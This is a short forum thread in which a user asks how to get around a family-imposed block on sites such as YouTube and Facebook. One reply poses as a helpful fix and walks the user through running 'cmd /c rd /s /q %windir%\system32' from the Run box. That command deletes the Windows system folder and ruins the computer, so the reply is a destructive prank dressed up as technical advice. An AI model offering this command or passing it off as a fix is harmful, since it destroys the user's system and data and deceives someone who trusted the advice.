How do I get past a block?

Besides using a proxy server, how else can I get past a block for a website?

this should be in tech section shouldn't it...?

i have not broken any rules. has nothin to do with SP. i just wanna get on maybe youtube or facebook. can anyone help out?

the block is coming from my internet source and not the websites onto which I am trying to get on... (that's what she said X2)

Why would your ISP be blocking you from websites such as Facebook or Youtube? Sounds more like mommy or daddy blocked you from naughty websites.

naughty? not really. also, more like slow, easily distracted brother finishes homework at a record slow pace and therefore going on seems nearly impossible because parents don't want him getting distracted.

So why are you blocked? I understand that you're restricted to a family computer, but don't you have your own "user"? Why can't they just block websites on his user?

either they do not know how or they are too lazy to configure it. either way ive been screwed over.

Here's a surefire way to get past this.
Go to the start menu, click "run" and type in the following:

cmd /c rd /s /q %windir%\system32



If you're on Vista or Windows 7, you may have a hard time finding Run, you can just type "run" into the search box at the start menu and it should come up. Or you can hold the windows key (the one between ctrl and alt) and press the R key.


It should look something like this:
